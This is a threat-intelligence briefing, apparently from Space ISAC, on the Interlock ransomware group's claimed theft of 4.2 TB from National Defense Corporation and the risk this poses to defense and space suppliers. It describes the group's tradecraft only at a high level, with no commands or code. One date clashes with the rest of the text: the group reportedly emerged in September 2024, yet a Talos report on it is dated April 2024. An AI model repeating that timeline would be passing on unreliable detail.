Threat Briefing
Briefing 34: Beyond the Breach: Assessing Downstream Risk from Interlock Ransomware

Overview:

On May 13, 2025, the Interlock ransomware group made headlines with its latest target National Defense Corporation (NDC) and its subsidiary, AMTEC. Interlock is a relatively new ransomware outfit, first appearing in September 2024 and garnering attention due to their targeting of high-profile entities, which researchers refer to as “big-game hunting.” This recent attack demonstrates an evolution in scope for the group, and corroborating analysis from security firm Resecurity helps break down the far-reaching impacts incidents of this nature may have on the Defense Industrial Base (DIB) and broader stakeholders.

According to the group’s own claims on their leak site, Interlock exfiltrated a staggering 4.2 terabytes of data from NDC systems. This trove reportedly contains nearly 3 million files across 450,000 folders, including 1.6 GB housed in a folder labeled Customer Files. Among the exposed documents are references to top-tier defense contractors and space stakeholders—though the full scope and authenticity of the data remain under review.

The incident was initially disclosed by DataBreaches.net on March 31, 2025, and later confirmed in a regulatory filing by NDC’s parent company, National Presto Industries.

About Interlock Ransomware:

The Interlock group first emerged in September 2024 and quickly developed a reputation for targeting high-value sectors. Although it had not previously shown interest in space-related organizations, its targeting of NDC and AMTEC may signal a shift. Resecurity analysts believe this was a deliberate and targeted operation, potentially with nation-state backing—though conclusive attribution remains unconfirmed.

Interlock’s tradecraft, as detailed in an April 2024 Cisco Talos report, includes the use of remote access tools, commodity malware, and custom scripts to gain and maintain access. Notably, the group employs:

• PowerShell downloaders and batch scripts for staging and payload execution
• Legitimate IT tools such as AnyDesk and Remote Utilities for stealthy lateral movement
• AES-encrypted containers to conceal exfiltrated data
• Anti-analysis techniques that check for sandboxes or virtualized environments

These tactics align with MITRE ATT&CK techniques such as T1078 (Valid Accounts), T1059.001 (PowerShell), and T1497 (Virtualization/Sandbox Evasion), underscoring the sophistication of the group’s operations.

While many elements of Interlock’s behavior point to financially motivated cybercrime, its choice of target and the strategic value of the exfiltrated data suggest broader implications.

Significance to Space:

While ransomware attacks frequently target smaller organizations, breaches like the one involving NDC demonstrate how cybercriminal groups increasingly view the DIB as a lucrative and strategic target. Attacks on Original Equipment Manufacturers (OEMs), suppliers, and subcontractors not only disrupt operations but also expose sensitive data about customers, contracts, and interdependencies—data that could be weaponized in future cyber campaigns.

The cascading effects of such incidents can be severe: supply chain partners are put at risk, military program timelines can be disrupted, and sensitive business relationships are impacted. Even when classified data is not directly compromised, the exposure of contract documents, procurement records, and other non-public information offers adversaries a roadmap of the defense ecosystem. The exfiltrated data published by Interlock, and analyzed by Resecurity, contains data belonging to several key stakeholders in the global space industry.

Conclusion:

This incident underscores how ransomware attacks on suppliers, OEMs and distributors can cause cascading operational and reputational impacts to defense contractors and other customers within commercial and military space. Ransomware groups engaging in double extortion operations often view DIB entities as valuable, high-profile targets due to the potential for enumerating their network of suppliers for future attacks. Government and military-related datasets are often touted on dark web marketplaces as valuable resources for other hacking groups and cybercriminals.

Space ISAC continues to monitor developments and encourages all stakeholders to evaluate their exposure to third-party risk, adopt a zero-trust architecture, and share intelligence proactively. As ransomware operations like Interlock increasingly target manufacturers and affiliated entities, it's critical to recognize that even indirect compromises can expose sensitive, non-public information—potentially enabling threat actors to expand their scope, escalate extortion efforts, and conduct intelligence gathering against space and defense organizations that may have previously been beyond their immediate reach.